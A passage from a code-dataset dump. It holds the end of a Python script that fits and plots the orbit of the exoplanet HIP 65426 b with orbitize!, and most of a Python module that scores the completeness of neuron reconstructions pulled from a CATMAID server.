True, False, True)\n7. all astrometry\n8. all astrometry with e fixed to 0\n9. all astrometry with linearly decreasing e prior\n10. all astrometry except NACO, linearly decreasing e prior\n\"\"\"\n\nnp.random.seed(10)\n\n\"\"\"\nBegin keywords <<\n\"\"\"\nrun_fit = False\nmake_corner = True\n\nlit_astrom = True\nfirst_grav = True\nsecond_grav = True\nthird_grav = True\nexclude_naco = False\nfix_ecc = False\nlin_ecc_prior = False\n\nsavedir = \"results/\"\n\nif not os.path.exists(savedir):\n os.mkdir(savedir)\n\nif lit_astrom:\n savedir += \"with_literature_astrom\"\nif first_grav:\n savedir += \"with_first_vlti_point\"\nif second_grav:\n savedir += \"with_second_vlti_point\"\nif third_grav:\n savedir += \"with_third_vlti_point\"\nif fix_ecc:\n savedir += \"_fixed_ecc\"\nif lin_ecc_prior:\n savedir += \"_linear_ecc\"\nif exclude_naco:\n savedir += \"_noNACO\"\n\"\"\"\n>> End keywords\n\"\"\"\n\nif not os.path.exists(savedir):\n os.mkdir(savedir)\n\ninput_file = \"HIP65426.csv\"\nplx = 9.303088053872793 # [mas] (Gaia eDR3)\nplx_err = 0.034559656\nm_st = 1.96 # [M_sol] (Bowler+ 2020)\nmass_err = 0.04\n\nnum_secondary_bodies = 1\ndata_table = read_input.read_file(input_file)\ninsts = data_table[\"instrument\"]\n\nif not lit_astrom:\n data_table = data_table[data_table[\"instrument\"] == \"GRAVITY\"]\nif not first_grav:\n data_table = data_table[0 : -2 & -2 :]\nif not second_grav:\n data_table = data_table[0 : -1 & -1]\nif not third_grav:\n data_table = data_table[0:-1]\nif exclude_naco:\n data_table = data_table[data_table[\"instrument\"] != \"NACO\"]\n\nprint(data_table)\n\nHIP654_system = system.System(\n num_secondary_bodies,\n data_table,\n m_st,\n plx,\n fit_secondary_mass=False,\n mass_err=mass_err,\n plx_err=plx_err,\n)\n\n# fix eccentricity to 0\nif fix_ecc:\n HIP654_system.sys_priors[HIP654_system.param_idx[\"ecc1\"]] = 0\n\n# set a linearly decreasing prior on ecc\nif lin_ecc_prior:\n HIP654_system.sys_priors[HIP654_system.param_idx[\"ecc1\"]] = priors.LinearPrior(\n -2.18, 2.01\n )\n\n# Check that orbitizie! initialized everything correctly.\n# (I wrote the code, therefore I do not trust the code.)\nassert not HIP654_system.fit_secondary_mass\nassert not HIP654_system.track_planet_perturbs\n\n# run MCMC\nnum_threads = 50\nnum_temps = 20\nnum_walkers = 1000\nnum_steps = 50_000_000 # 200_000_000 # n_walkers x n_steps_per_walker\nburn_steps = 10_000 # 100_000\nthin = 100\n\nif run_fit:\n HIP654_sampler = sampler.MCMC(\n HIP654_system,\n num_threads=num_threads,\n num_temps=num_temps,\n num_walkers=num_walkers,\n )\n HIP654_sampler.run_sampler(num_steps, burn_steps=burn_steps, thin=thin)\n\n # save chains\n HIP654_sampler.results.save_results(\"{}/chains.hdf5\".format(savedir))\n\nHIP654_results = results.Results() # create blank results object for loading\nHIP654_results.load_results(\"{}/chains.hdf5\".format(savedir))\n\n# chop chains\n# num_chop = 1000\n# reshaped_post = HIP654_results.post.reshape(\n# (num_walkers, num_steps // num_walkers // thin, HIP654_results.post.shape[1])\n# )\n# HIP654_results.post = reshaped_post[:, -num_chop:, :].reshape(\n# (-1, HIP654_results.post.shape[1])\n# )\n\n# make corner plot\n\nif make_corner:\n if fix_ecc:\n param_list = [\"sma1\", \"inc1\", \"aop1\", \"pan1\", \"tau1\", \"mtot\", \"plx\"]\n else:\n param_list = None\n\n corner_kwargs = {\"show_titles\": True} # , \"quantiles\": [0.16, 0.84]}\n\n # median_values = np.median(HIP654_results.post, axis=0)\n # range_values = np.ones_like(median_values)*0.997 # Plot only 3-sigma range for each parameter\n fig = HIP654_results.plot_corner(\n param_list=param_list, range=[(40, 120), 1, 1, 1, 1, 1, 1, 1], **corner_kwargs\n )\n for ax in fig.get_axes():\n ax.tick_params(axis=\"both\", labelsize=14)\n ax.set_xlabel(ax.get_xlabel(), fontsize=14)\n ax.set_ylabel(ax.get_ylabel(), fontsize=14)\n ax.set_title(ax.get_title(), fontsize=14)\n plt.savefig(\"{}/corner.png\".format(savedir), dpi=250)\n\n# make orbit plot\nfig = HIP654_results.plot_orbits(\n num_epochs_to_plot=500, start_mjd=56000, plot_astrometry=False\n)\nradec_ax, sep_ax, pa_ax, cbar_ax = fig.axes\n\nsep, serr, pa, paerr = (\n data_table[\"quant1\"],\n data_table[\"quant1_err\"],\n data_table[\"quant2\"],\n data_table[\"quant2_err\"],\n)\nepoch = Time(data_table[\"epoch\"], format=\"mjd\").decimalyear\n\nsphere_mask = np.where(insts == \"SPHERE\")[0]\nnaco_mask = np.where(insts == \"NACO\")[0]\ngrav_mask = np.where(insts == \"GRAVITY\")[0]\n\ngravity_ra, gravity_dec = sep[grav_mask], pa[grav_mask]\nsphere_ra, sphere_dec = system.seppa2radec(sep[sphere_mask], pa[sphere_mask])\nnaco_ra, naco_dec = system.seppa2radec(sep[naco_mask], pa[naco_mask])\n\nradec_ax.scatter(sphere_ra, sphere_dec, marker=\"o\", color=\"hotpink\", zorder=20, s=3)\nradec_ax.scatter(naco_ra, naco_dec, marker=\"o\", color=\"hotpink\", zorder=20, s=3)\nradec_ax.scatter(gravity_ra, gravity_dec, marker=\"o\", color=\"hotpink\", zorder=20, s=3)\n\ngravity_sep, gravity_pa = system.radec2seppa(sep[grav_mask], pa[grav_mask])\n\ngravity_raerr, gravity_decerr, gravity_corr = (\n data_table[\"quant1_err\"][grav_mask],\n data_table[\"quant2_err\"][grav_mask],\n data_table[\"quant12_corr\"][grav_mask],\n)\n\nsep_ax.errorbar(\n epoch[sphere_mask],\n sep[sphere_mask],\n serr[sphere_mask],\n marker=\"^\",\n color=\"purple\",\n markeredgecolor=\"purple\",\n markerfacecolor=\"white\",\n ls=\"\",\n label=\"SPHERE\",\n)\nsep_ax.errorbar(\n epoch[naco_mask],\n sep[naco_mask],\n serr[naco_mask],\n marker=\"s\",\n ls=\"\",\n color=\"purple\",\n label=\"NACO\",\n)\nsep_ax.scatter(\n epoch[grav_mask], gravity_sep, label=\"GRAVITY\", zorder=20, color=\"hotpink\"\n)\nsep_ax.legend()\n\npa_ax.errorbar(\n epoch[sphere_mask],\n pa[sphere_mask],\n paerr[sphere_mask],\n marker=\"^\",\n color=\"purple\",\n markeredgecolor=\"purple\",\n markerfacecolor=\"white\",\n ls=\"\",\n)\npa_ax.errorbar(\n epoch[naco_mask], pa[naco_mask], paerr[naco_mask], marker=\"s\", ls=\"\", color=\"purple\"\n)\npa_ax.scatter(epoch[grav_mask], gravity_pa, zorder=20, color=\"hotpink\")\n\nl, b, w, h = cbar_ax.get_position().bounds\n# cbar_ax.set_position([l - 0.05, b, w, h])\ncbar_ax.set_position([l - 0.17, b, w, h])\n\nl, b, w, h = pa_ax.get_position().bounds\n\n\ndef confidence_ellipse(\n x, y, corr, x_unc, y_unc, ax, n_std=3.0, facecolor=\"hotpink\", alpha=1\n):\n \"\"\"\n Create a plot of the covariance confidence ellipse of *x* and *y*.\n (shamelessly stolen from matplotlib docs)\n \"\"\"\n\n # Using a special case to obtain the eigenvalues of this\n # two-dimensional dataset.\n ell_radius_x = np.sqrt(1 + corr)\n ell_radius_y = np.sqrt(1 - corr)\n ellipse = patches.Ellipse(\n (0, 0),\n width=ell_radius_x * 2,\n height=ell_radius_y * 2,\n facecolor=facecolor,\n alpha=alpha,\n zorder=20,\n )\n\n # Calculating the standard deviation of x from\n # the squareroot of the variance and multiplying\n # with the given number of standard deviations.\n scale_x = x_unc * n_std\n mean_x = x\n\n # calculating the standard deviation of y ...\n scale_y = y_unc * n_std\n mean_y = y\n\n transf = (\n transforms.Affine2D()\n .rotate_deg(45)\n .scale(scale_x, scale_y)\n .translate(mean_x, mean_y)\n )\n\n ellipse.set_transform(transf + ax.transData)\n return ax.add_patch(ellipse)\n\n\nfig.subplots_adjust(right=0.6)\nradec_ax.set_position([0.05, b, w - 0.03, 0.77])\npa_ax.set_position([l - 0.23, b, w - 0.06, h])\nsep_ax.set_position([l - 0.23, b + 0.42, w - 0.06, h])\n\nfor i in np.arange(len(grav_mask)):\n if i > 1:\n grav_ax = fig.add_axes([0.82, b, 0.1, h])\n else:\n grav_ax = fig.add_axes([0.68, b + 0.42 * i, 0.1, h])\n for n_std in [1, 2]:\n ellipse = confidence_ellipse(\n gravity_ra[i],\n gravity_dec[i],\n gravity_corr[i],\n gravity_raerr[i],\n gravity_decerr[i],\n grav_ax,\n n_std=n_std,\n alpha=1 - n_std / 4,\n )\n\n grav_ax.set_xlim(gravity_ra[i] + 0.3, gravity_ra[i] - 0.3)\n grav_ax.set_ylim(gravity_dec[i] - 0.5, gravity_dec[i] + 0.5)\n grav_ax.set_aspect(\"equal\")\n\n if i == 0 or i == 2:\n grav_ax.set_xlabel(\"$\\Delta$RA [mas]\")\n if i < 2:\n grav_ax.set_ylabel(\"$\\Delta$Dec [mas]\")\n\n for j in np.arange(len(sep_ax.lines) - 2):\n orbittracks_sep = sep_ax.lines[j].get_ydata()\n orbittracks_pa = pa_ax.lines[j].get_ydata()\n ra2plot, dec2plot = system.seppa2radec(orbittracks_sep, orbittracks_pa)\n grav_ax.plot(ra2plot, dec2plot, color=\"lightgrey\")\n grav_ax.text(\n gravity_ra[i] + 0.27, gravity_dec[i] + 0.4, \"Epoch {}\".format(i + 1)\n )\n\npa_ax.set_xlabel(\"Epoch [year]\")\nradec_ax.set_aspect(\"equal\")\nplt.savefig(\"{}/orbit.png\".format(savedir), dpi=250)\n","repo_name":"sblunt/hip65426","sub_path":"fit_orbit.py","file_name":"fit_orbit.py","file_ext":"py","file_size_in_byte":9510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29534216978","text":"import catalysis.catmaid_interface as ci\nimport catalysis.neurons as na\nimport catalysis.pynblast as pynblast\n\nfrom collections import defaultdict\nimport pandas as pd\nimport numpy as np\nfrom numpy import NaN\n\ndef root_is_soma( nrn ):\n \"\"\"\n Check that a neuron's root is tagged 'soma' and no other node is tagged\n similarly.\n\n Parameters\n ----------\n nrn : Neuron object.\n Neuron to test\n\n Returns\n ----------\n Boolean\n True if root is soma, false otherwise.\n \"\"\"\n val = False\n if 'soma' in nrn.tags.keys():\n if len(nrn.tags['soma']) == 1:\n if nrn.tags['soma'][0] == nrn.root:\n val = True\n\n if 'to nerve' in nrn.tags.keys():\n if len(nrn.tags['to nerve']) == 1:\n if nrn.tags['to nerve'][0] == nrn.root:\n val = True\n\n return val\n\ndef open_ends( nrn, include_uncertain = True ):\n \"\"\"\n Check that end nodes fall into the appropriate 'blessed' tags.\n Parameters\n ----------\n nrn : Neuron object\n Neuron to test\n\n include_uncertain : Boolean (Default : True)\n Boolean variable associated with whether to include \"uncertain ends\"\n and \"uncertain continuation\" in the statistics.\n\n Returns\n ----------\n double\n Fraction of open ends that are tagged complete.\n\n int\n Number of open ends.\n\n int\n Number of total ends.\n\n \"\"\"\n if include_uncertain:\n blessed_tags = ['ends',\n 'soma',\n 'not a branch',\n 'uncertain end',\n 'uncertain continuation']\n else:\n blessed_tags = ['ends',\n 'soma',\n 'not a branch']\n\n open_end_nodes = set( nrn.find_end_nodes() )\n num_ends = len(open_end_nodes)\n\n for tag in blessed_tags:\n if tag in nrn.tags.keys():\n open_end_nodes.difference_update( set(nrn.tags[tag]) )\n\n rem_ends = len(open_end_nodes)\n frac_open = (rem_ends+0.0) / (num_ends + 0.0)\n return frac_open, rem_ends, num_ends\n\ndef fragment_test( nrn ):\n \"\"\"\n A fragment is defined as having no soma\n \"\"\"\n if 'soma' in nrn.tags.keys() or 'to nerve' in nrn.tags.keys():\n return False\n else:\n return True\n\ndef property_summary_exact( nrns ):\n \"\"\"\n Generate a readable table summarizing the completeness of reconstruction for\n a group of neurons.\n Parameters\n ----------\n nrns : NeuronDictObject\n Collection of neurons to analyze\n\n Returns\n ----------\n DataFrame\n Data frame describing completeness of neurons\n \"\"\"\n\n ids = [nrn.id for nrn in nrns]\n names = [nrn.name for nrn in nrns]\n fraction_open_ends = [ open_ends(nrn)[0] for nrn in nrns]\n num_open_ends = [ open_ends(nrn)[1] for nrn in nrns]\n num_ends = [open_ends(nrn)[2] for nrn in nrns]\n correct_root = [ root_is_soma(nrn) for nrn in nrns ]\n node_count = [ nrn.node_count() for nrn in nrns ]\n is_fragment = [ fragment_test(nrn) for nrn in nrns ]\n dat = { 'names':names,\n 'fraction_open_ends':fraction_open_ends,\n 'num_open_ends':num_open_ends,\n 'total_ends':num_ends,\n 'rooted_at_soma':correct_root,\n 'node_count':node_count,\n 'is_fragment':is_fragment}\n\n if nrns.CatmaidInterface is not None:\n review_status = nrns.CatmaidInterface.get_review_status(ids)\n rev_frac = [ (review_status[str(id)][1]+0.0)\n / (review_status[str(id)][0]+0.0) for id in ids ]\n dat['review_fraction'] = rev_frac\n return pd.DataFrame(dat, index=ids)\n\ndef property_summary_estimated( ids, CatmaidInterface ):\n \"\"\"\n A thinner version of property_summary_exact that only retrieves specific\n relevent info, but only approximates total number of end nodes and is\n thus faster than completeness_summary_exact.\n\n Parameters\n ----------\n ids : list of ids\n Ids for neurons to query completeness for.\n\n CatmaidInterface : CatmaidDataInterface\n CatmaidDataInterface for a specific project.\n\n Returns\n -------\n DataFrame\n DataFrame describing the completeness status of neurons\n\n \"\"\"\n namedict = CatmaidInterface.get_neuron_names( ids )\n names = {int(id) : namedict[id] for id in namedict}\n fraction_open_ends = []\n num_open_ends = []\n num_ends = []\n correct_root = []\n node_count = []\n is_fragment = []\n\n for id in ids:\n noe = len( CatmaidInterface.get_open_ends( id ) )\n nce = len( CatmaidInterface.get_closed_ends( id ) )\n sn = CatmaidInterface.tag_query_for_skeleton( id, '^soma$|^out to nerve$')\n rn = CatmaidInterface.root_for_skeleton( id )['root_id']\n fraction_open_ends.append( (noe+0.0)/(noe+nce+0.0) )\n num_open_ends.append( noe )\n num_ends.append( noe+nce )\n if rn in sn:\n correct_root.append( True )\n else:\n correct_root.append( False )\n node_count.append( CatmaidInterface.node_count( id )['count'] )\n if len(sn) == 0:\n is_fragment.append( True )\n else:\n is_fragment.append( False )\n\n dat = { 'names':names,\n 'fraction_open_ends':fraction_open_ends,\n 'num_open_ends':num_open_ends,\n 'total_ends':num_ends,\n 'rooted_at_soma':correct_root,\n 'node_count':node_count,\n 'is_fragment':is_fragment}\n\n review_status = CatmaidInterface.get_review_status(ids)\n rev_frac = [ (review_status[str(id)][1]+0.0)\n / (review_status[str(id)][0]+0.0) for id in ids ]\n dat['review_fraction'] = rev_frac\n\n return pd.DataFrame(dat, index=ids)\n\ndef completion_categories( property_summary = None,\n completeness_threshold = 0.97,\n review_threshold = 0.97 ):\n \"\"\"\n Returns a dict describing which neurons belong to which completeness\n categories. This takes a property summary as its input.\n\n Parameters\n ----------\n property_summary : DataFrame\n A property summary from either property_summary_exact or\n property_summary_estimated.\n\n completeness_threshold : float (optional, default = 0.97)\n The mininum fraction of complete end nodes a neuron must have to be\n considered complete.\n\n review_threshold : float (optional, default = 0.97)\n The minimum fraction of reviewed nodes a neuron must have to be\n considered reviewed.\n\n Returns\n -------\n dict\n Dict of categories (keys), with values being a list of ids.\n Categories are:\n Untraced : Only a single untagged node.\n Incomplete Fragment : Fragment (no soma) with open ends (presumed unfinished)\n Complete Fragment : Fragment with no more open ends (presumed attempted and failed)\n Incomplete Neuron : Neuron (unique soma), but open ends.\n Complete Neuron : Neuron with no open ends.\n Reviewed Complete Neuron : Neuron with no open ends and substantially reviewed. (if include_reviewed = True)\n \"\"\"\n\n categories = {'Untraced':[],\n 'Incomplete fragment':[],\n 'Complete fragment':[],\n 'Incomplete neuron':[],\n 'Complete neuron':[],\n 'Reviewed complete neuron':[]\n }\n\n if property_summary is not None:\n for id in property_summary.index.values:\n if property_summary.loc[id]['node_count'] == 1:\n categories['Untraced'].append(id)\n elif property_summary.loc[id]['is_fragment']:\n if property_summary.loc[id]['fraction_open_ends'] <= 1-completeness_threshold:\n categories['Complete fragment'].append(id)\n else:\n categories['Incomplete fragment'].append(id)\n elif property_summary.loc[id]['fraction_open_ends'] > 1-completeness_threshold:\n categories['Incomplete neuron'].append(id)\n elif property_summary.loc[id]['review_fraction'] >= review_threshold:\n categories['Reviewed complete neuron'].append(id)\n else:\n categories['Complete neuron'].append(id)\n return categories\n\n\ndef category_summary( categories, syn_df=None, as_df = True, nans=False ):\n \"\"\"\n For a given categorization and synaptic connectivity table, summarize\n cateogries by number and synaptic count.\n\n Parameters\n ----------\n categories : dict\n Dict keyed by category name with values being lists of neuron ids.\n\n syn_df : dataframe (optional, default is None)\n DataFrame representing a table of synaptic connectivity formated like in\n synaptic_partner_tables.\n\n as_df : Boolean (optional, default is True)\n Determines if the response is a dataframe or remains a dict.\n\n nans : Boolean (optional, default is False)\n Returns only nans. Useful to generate reports that have the right shape,\n but no data.\n\n Returns\n ----------\n DataFrame (or dict, if as_df=False)\n DataFrame indexed by categories, with columns being number of neurons\n and synapses.\n\n \"\"\"\n\n ids_cat = set( [item for sublist in [categories[cat] for cat in categories]\n for item in sublist if item is not None] )\n if syn_df is not None:\n # Remove any None objects that could happen in case of\n # connector with no other annotation\n ids_syn = set( filter( None.__ne__, syn_df.index.values ) ) \n if ids_cat != ids_syn:\n print(ids_cat)\n print(ids_syn)\n raise ValueError(\"IDs in categories and dataframe must be the same\")\n\n cat_by_syn = {}\n cat_by_num = {}\n for cat in categories:\n if nans:\n cat_by_num[cat] = NaN\n cat_by_syn[cat] = NaN\n elif len( categories[cat] ) > 0:\n if syn_df is not None:\n cat_by_syn[cat] = syn_df.loc[ categories[cat] ].sum().sum()\n else:\n cat_by_syn[cat] = NaN\n cat_by_num[cat] = len( categories[cat] )\n else:\n if syn_df is not None:\n cat_by_syn[cat] = 0\n else:\n cat_by_syn[cat] = NaN\n cat_by_num[cat] = 0\n\n if as_df:\n return pd.DataFrame(\n {'Synapses': cat_by_syn,'Number':cat_by_num} ).reindex(\n ['Untraced',\n 'Incomplete fragment',\n 'Incomplete neuron',\n 'Complete fragment',\n 'Complete neuron',\n 'Reviewed complete neuron'] )\n else:\n return cat_by_syn, cat_by_num\n\ndef category_summary_from_neurons( nrns, estimate_partner_completion = True, include_presynaptic = False, include_postsynaptic = False, max_neurons_per_post = 50 ):\n \"\"\"\n Generate category reports about neurons and their partners from a list of neurons.\n\n Parameters\n ----------\n nrns : NeuronList\n NeuronList forming the basis for the category summary.\n\n estimate_partner_completion : Boolean (default is True)\n If properties of partners are computed, this value determines if the estimated or the exact property function is used.\n\n include_presynaptic : Boolean (default is False)\n Determines if an estimate of the properties of the presynaptic neurons is included.\n\n include_postsynaptic : Boolean (default is False)\n Determines if an estimate of the properties of the postsynaptic neurons is included.\n\n as_df : Boolean (defualt is True)\n Determines if the result is returned as a DataFrame or a dict.\n\n Returns\n -------\n dict\n Dict with keys 'Base', 'Inputs', and 'Outputs', each containing the results of category_summary on the main list of neurons,\n the collection of presynaptic neurons (Inputs), or the collection of postsynaptic neurons (Outputs)\n \"\"\"\n\n main_cats = completion_categories( property_summary_exact( nrns ) )\n main_report = category_summary(main_cats)\n\n input_df, output_df = na.synaptic_partner_tables( nrns, include_presynaptic=include_presynaptic, include_postsynaptic=include_postsynaptic )\n if include_presynaptic:\n print( ' Computing presynaptic categories...')\n pre_ids = [id for id in input_df.index.values if id is not None]\n if estimate_partner_completion:\n input_neurons = na.NeuronList.from_id_list( pre_ids, nrns.CatmaidInterface, max_neurons_per_post=max_neurons_per_post )\n input_cats = completion_categories( property_summary_exact( input_neurons ) )\n else:\n input_cats = completion_categories( property_summary_estimated( pre_ids, nrns.CatmaidInterface ) )\n input_report = category_summary(input_cats, input_df)\n\n else:\n input_report = category_summary( main_cats, nans = True )\n\n if include_postsynaptic:\n print( ' Computing postsynaptic categories...')\n post_ids = [id for id in output_df.index.values if id is not None]\n if estimate_partner_completion:\n output_neurons = na.NeuronList.from_id_list( post_ids, nrns.CatmaidInterface, max_neurons_per_post=max_neurons_per_post )\n output_cats = completion_categories( property_summary_exact( output_neurons ) )\n else:\n output_cats = completion_categories( property_summary_estimated( post_ids, nrns.CatmaidInterface ) )\n output_report = category_summary(output_cats, output_df)\n else:\n output_report = category_summary( main_cats, nans = True )\n\n report = {'Base': main_report, 'Inputs': input_report, 'Outputs': output_report }\n return report\n\ndef completeness_report( CatmaidInterface,\n annos = [],\n id_list = [],\n estimate_partner_completion = True,\n include_presynaptic = False,\n include_postsynaptic = False,\n complete_categories = None,\n max_neurons_per_post = 50):\n \"\"\"\n Build a report on a set of neurons from annotations or ids, pulling them from a Catmaid instance.\n\n Parameters\n ----------\n CatmaidInterface : CatmaidDataInterface\n Interface for the catmaid instance to use.\n\n annos : list of strings or ints (optional, default is [])\n List of annotation ids or names to query.\n\n id_list : list of ints (optional, default is [])\n List of Neuron ids to query.\n\n estimate_partner_completion : Boolean (default = True)\n Boolean value selecting whether partners have estimated or exact completeness.\n\n include_presynaptic : Boolean (default = False)\n Determines whether the set of presynaptic neurons are queried or not.\n\n include_postsynaptic : Boolean (default = False)\n Determines whether the set of postsynaptic neurons are queried or not.\n\n complete_categories : List of strings (optional, default = None)\n Overrides the default categories that are considered 'complete'.\n\n Returns\n -------\n DataFrame\n DataFrame summarizing the completion status of neurons and, if desired, the set of partners.\n \"\"\"\n if type(annos) is str:\n annos = [annos]\n\n if len(id_list) > 0 and len(annos) > 0:\n id_tag = ' and Specified Ids'\n elif len(id_list) > 0 and len(annos)==0:\n id_tag = ', '.join( id_list )\n else:\n id_tag = ''\n if len(annos) > 1:\n anno_tag = ' and '.join(annos)\n elif len(annos) > 0:\n anno_tag = str( annos[0] )\n else:\n anno_tag = {}\n anno_name = anno_tag + id_tag\n\n id_list = list( set( id_list + CatmaidInterface.get_ids_from_annotations(annos, flatten=True) ) )\n nrns = na.NeuronList.from_id_list( id_list, CatmaidInterface, max_neurons_per_post=max_neurons_per_post )\n cats = category_summary_from_neurons( nrns, include_presynaptic = include_presynaptic, include_postsynaptic = include_postsynaptic )\n\n return report_from_summary( cats, anno_name=anno_name )\n\ndef report_from_summary( category_summary, complete_categories = None, anno_name=None):\n \"\"\"\n Given a category summary, generate a report DataFrame.\n\n Parameters\n ----------\n category_summary : Dict\n Dict coming out of category_summary_from_neurons\n\n complete_categories : List of str\n Overriding list of categories to be considered complete.\n\n anno_name : string\n Name describing the group, for cosmetic use in the dataframe.\n\n Returns\n -------\n DataFrame\n DataFrame summarizing completion status.\n \"\"\"\n if complete_categories is None:\n complete_categories = ['Complete fragment', 'Complete neuron', 'Reviewed complete neuron']\n if anno_name is None:\n anno_name = 'Group'\n\n base_complete, base_inc, base_frac, base_complete_syn, base_frac_syn = _report_categories( category_summary['Base'], complete_categories=complete_categories )\n input_complete, input_inc, input_frac, input_complete_syn, input_frac_syn = _report_categories( category_summary['Inputs'], complete_categories=complete_categories )\n output_complete, output_inc, output_frac, output_complete_syn, outputfrac_syn = _report_categories( category_summary['Outputs'], complete_categories=complete_categories )\n\n num_master = {anno_name:base_complete, 'Inputs':input_complete, 'Outputs':output_complete}\n\n inc_master = {anno_name:base_inc,\n 'Inputs':input_inc,\n 'Outputs':output_inc }\n\n frac_master = {anno_name: base_frac ,\n 'Inputs': input_frac,\n 'Outputs': output_frac}\n\n num_master_syn = {anno_name:base_complete_syn, 'Inputs':input_complete_syn, 'Outputs':output_complete_syn}\n\n frac_master_syn = {anno_name:base_complete_syn / sum(category_summary['Base'].Synapses),\n 'Inputs': input_complete_syn / sum(category_summary['Inputs'].Synapses),\n 'Outputs': output_complete_syn / sum(category_summary['Outputs'].Synapses)}\n return pd.DataFrame({'Number Complete':num_master, 'Number Incomplete': inc_master, 'Fraction Complete':frac_master,\n 'Synapses Complete':num_master_syn, 'Fraction Synapses Complete':frac_master_syn})\n\n\ndef _report_categories( dat, complete_categories ):\n \"\"\"\n Compute needed details of categories to generate report.\n \"\"\"\n comp_num = sum( [ dat.Number[cat] for cat in complete_categories] )\n incomp_num = sum( dat.Number ) - comp_num\n frac_num = comp_num / sum(dat.Number)\n comp_syn = sum( [ dat.Synapses[cat] for cat in complete_categories] )\n frac_syn = comp_syn / sum(dat.Synapses)\n return comp_num, incomp_num, frac_num, comp_syn, frac_syn\n\ndef match_groups( id_list1, id_list2, match_via, CatmaidInterface, anno_reference='names' ):\n \"\"\"\n Given two lists of neurons, match their elements if they share an annotation (such as cell type) indicated by a specific metaannotation.\n\n Parameters\n ----------\n id_list1 : list of ints\n List of skeleton ids in the first group\n\n id_list2 : list of ints\n List of skeleton ids in the second group\n\n match_via : string or int\n Annotation (as name or id) that annotates the annotatoins to match.\n\n CatmaidInterface : CatmaidDataInterface\n Interface for the Catmaid instance to query.\n\n anno_reference : 'names' or 'ids' (optional, default is 'names')\n\n Returns\n -------\n dict\n Match report, indexed by annotation name or id.\n \"\"\"\n annos_with_meta = set(CatmaidInterface.get_annotations_from_meta_annotations( match_via, flatten=True ) )\n annos1 = { id: set(CatmaidInterface.get_annotations_for_objects( [id] )).intersection(annos_with_meta) for id in id_list1}\n annos2 = { id: set(CatmaidInterface.get_annotations_for_objects( [id] )).intersection(annos_with_meta) for id in id_list2}\n\n matches = {}\n for id1 in annos1:\n for id2 in annos2:\n for anno_id in annos1[id1].intersection(annos2[id2]):\n if anno_reference is 'ids':\n matches[anno_id] = [id1, id2]\n elif anno_reference is 'names':\n matches[ CatmaidInterface.parse_annotation_list(anno_id, output='names')[0] ] = [id1, id2]\n\n return matches\n\ndef match_report( id_list1, id_list2, match_via, CatmaidInterface, name1='Group 1', name2='Group 2', anno_reference = 'names', skip_annos=None, show_completeness=True ):\n \"\"\"\n Given two lists of neurons, match their elements if they share an annotation (such as cell type) indicated by a specific metaannotation.\n\n Parameters\n ----------\n id_list1 : list of ints\n List of skeleton ids in the first group\n\n id_list2 : list of ints\n List of skeleton ids in the second group\n\n match_via : string or int\n Annotation (as name or id) that annotates the annotatoins to match.\n\n CatmaidInterface : CatmaidDataInterface\n Interface for the Catmaid instance to query.\n\n name1 = string (Default is 'Group 1')\n Label for the first group.\n\n name2 = string (Default is 'Group 2')\n Label for the second group.\n\n anno_reference : 'names' or 'ids' (optional, default is 'names')\n\n skip_annos : list of strings (optional, Default is None)\n List of annotations of neurons to not include in the final report.\n\n Returns\n -------\n DataFrame\n Organized, readable match report\n\n \"\"\"\n if skip_annos is not None:\n ids_to_skip = CatmaidInterface.get_ids_from_annotations(skip_annos, flatten=True)\n id_list1 = list( set(id_list1).difference(set(ids_to_skip)))\n id_list2 = list( set(id_list2).difference(set(ids_to_skip)))\n\n annos = CatmaidInterface.get_annotations()\n rev_dict = { annos[key] : key for key in annos }\n\n matches = match_groups( id_list1, id_list2, match_via, CatmaidInterface )\n matched = [[],[]]\n match_report1 = {}\n match_report2 = {}\n for anno in matches:\n if type(anno) is int:\n #anno_name = annos[anno_id] + ' (' + str(anno_id) + ')'\n anno_name = rev_dict[anno] + ' (' + str(anno) + ')'\n else:\n anno_name = anno\n matched[0].append( matches[anno][0] )\n matched[1].append( matches[anno][1] )\n match_report1[ anno_name ] = matches[anno][0]\n match_report2[ anno_name ] = matches[anno][1]\n\n unmatched1 = set(id_list1).difference( set(match_report1.values()) )\n unmatched2 = set(id_list2).difference( set(match_report2.values()) )\n match_report1['Unmatched'] = list(unmatched1)\n match_report2['Unmatched'] = list(unmatched2)\n\n if show_completeness:\n ps = property_summary_estimated(id_list1+id_list2, CatmaidInterface )\n match_completed1 = _match_completed(ps, match_report1 )\n match_completed2 = _match_completed(ps, match_report2 )\n report = pd.DataFrame( { name1: match_report1, name2: match_report2, name1+'_complete':match_completed1, name2+'_complete':match_completed2} )\n else:\n report = pd.DataFrame( { name1: match_report1, name2: match_report2 } )\n\n return report\n\ndef _match_completed( ps, match_report, min_open_ends=0.05, ):\n match_completed = dict()\n for lin in match_report:\n if isinstance( match_report[lin], np.integer ):\n relids = [match_report[lin]]\n else:\n relids = match_report[lin]\n match_completed[lin] = []\n for skid in relids:\n if ps[ps.index==skid]['is_fragment'].bool() is False and (ps[ps.index==skid]['fraction_open_ends'] < min_open_ends).bool():\n match_completed[lin].append(True)\n else:\n match_completed[lin].append(False)\n return match_completed\n\ndef match_report_from_annos( anno1, anno2, match_via, CatmaidInterface, anno_reference = 'names', skip_annos = None, show_completeness=False):\n \"\"\"\n Given two lists of neurons, match their elements if they share\n an annotation (such as cell type) indicated by a specific\n metaannotation.\n\n Parameters\n ----------\n anno1 : string\n Name of the annotation to query for group 1.\n\n anno2 : string\n Name of the annotation to query for group 2.\n\n match_via : string or int\n Annotation (as name or id) that annotates the annotations to\n match.\n\n CatmaidInterface : CatmaidDataInterface\n Interface for the Catmaid instance to query.\n\n anno_reference : 'names' or 'ids' (optional, default is 'names')\n Determines how annotations are refered to, either as strings or\n ids.\n\n Returns\n -------\n DataFrame\n Organized, human-readable match report\n\n \"\"\"\n return match_report( CatmaidInterface.get_ids_from_annotations(anno1,flatten=True),\n CatmaidInterface.get_ids_from_annotations(anno2,flatten=True),\n match_via,\n CatmaidInterface,\n skip_annos=skip_annos,\n name1 = anno1,\n name2 = anno2,\n show_completeness=show_completeness)\n\ndef report_from_annotation_list( anno_list, CatmaidInterface ):\n \"\"\"\n Generate a completeness report on every annotation in a list of annotations.\n\n Parameters\n ----------\n anno_list : list of ids or strings\n Annotations to query\n\n CatmaidInterface : CatmaidDataInterface\n Interaction object for a catmaid instance.\n\n Returns\n -------\n DataFrame\n DataFrame completion report where each row corresponds to an annotation.\n \"\"\"\n meta_rep = pd.DataFrame(columns = ['Number Complete','Number Incomplete','Fraction Complete','Synapses Complete','Fraction Synapses Complete'])\n\n for anno in anno_list:\n rep = 